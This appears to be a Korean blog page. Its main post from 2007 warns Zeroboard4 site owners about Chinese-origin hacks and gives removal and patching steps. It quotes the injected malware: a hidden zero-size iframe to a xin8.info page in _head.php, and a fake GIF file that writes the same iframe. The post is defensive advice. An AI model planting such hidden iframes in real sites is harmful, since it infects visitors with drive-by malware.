다른 사람의 글을 마구 본다면 곤란한데 말입니다.

'Digital Life' 카테고리의 다른 글

신촌 탐앤탐스 단점  (2) 2008.10.22
많이 늘었구나..  (0) 2008.10.07
제로보드XE 도 보안상에 문제가..  (1) 2008.08.18
3년 전 자료를 찾았습니다.  (0) 2008.08.17
전자기기는 재부팅이 필수!  (0) 2008.08.09
인코딩은 어렵네  (0) 2008.08.01
Posted by Parker Falcon

댓글을 달아주세요

  1. 민수
    2008.08.19 23:35
    댓글 주소 수정/삭제 댓글
    티스토리통해서(검색하다가) 들어왔는데 말이죠;;
    보안 문제는 제로님께 메일이나 쪽지로 보내면 빠른 패치를 하시던걸로 기억합니다;;
    -XE사용자로서 왠지모를 찜찜함;;

요즘 제로보드4에 대한 중국발 해킹이 늘어나면서
많은 홈페이지가 감염되고, 또한 사용자들도 감염되고 있습니다.


당장의 대책이라면 _head.php에

<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>
이것을 제거하시구요.
그리고 images폴더 아래에 admin_info.gif파일이 있는데
이것도 제거하십시요.
파일 내용은
images/admin_info.gif
document.write("<iframe width='0' height='0' src='http://d.xin8.info/daipi/css.htm'></iframe>");

이러합니다.


그리고 이런 작업은 홈페이지 관리자만 할 수 있습니다.

관리자가 할 수 있는 것은 제로보드의 최신 패치를 업데이트 하는 것 입니다.

제가 본 사이트 대부분이 2006년 3월 15일자 패치만을 해 둔 상태인데

http://www.zeroboard.com/zb4_download/803874로 가셔서 2007년 5월 23일짜 보안 패치까지 된 pl8버전을 받으시기 바랍니다.
제로보드에서 업데이트 중에 pl의 숫자를 올리지 않아서
많은 사람들이 업데이트가 없다고 생각한 것인지는 모르겠지만
아무튼 많은 분들께서 더이상의 업데이트를 하지 않으셨습니다.

그리고 일반 사용자분들 께서 하실 수 있는 일은

인터넷 익스플로어를 사용하신다면

도구 - 인터넷 옵션 - 보안 으로 가셔서

제한된 사이트 클릭하시고 목록에 *.xin8.info 를 입력하고 추가하시기 바랍니다.

다른 브라우져 (Firefox, Opera, Safari)를 사용 하시는 분들은 상관 없지만

인터넷 익스플로어 엔진을 사용하는 브라우져를 사용하시는 분들은 똑같이 추가하시기 바랍니다.

아무튼 다들 피해 없으시기 바랍니다 :)
Posted by Parker Falcon

댓글을 달아주세요

  1. 2007.11.02 07:46 신고
    댓글 주소 수정/삭제 댓글
    제로보드에서 새로운 패치가 공개되었습니다.
    http://www.zeroboard.com/zb4_download/803874

    0.1% 더 쉽게 풀어써보았습니다.
    http://quota.tistory.com/10
  2. 2007.11.03 21:06
    댓글 주소 수정/삭제 댓글
    안녕하세요.
    Parker Falcon님, 처음뵙겠습니다.
    올려주신 포스팅 덕분에 도움을 받았습니다..
    그리고 제홈페이지에 링크도 걸었고 해서 인사남기는게 예의같아서 ^^;
    ( http://ggerzer.com/349 )
    트랙백을 쏠까하다가,, 코멘트 남겨요..

    근데, 아무래도 이번 제로보드 해킹의 파장은 일파만파 퍼져나가고 있는것 같아요.
    저도 아직까진 큰 피해를 입진않았지만, 당분간은 계속 불안한 상태가 지속될것같아요.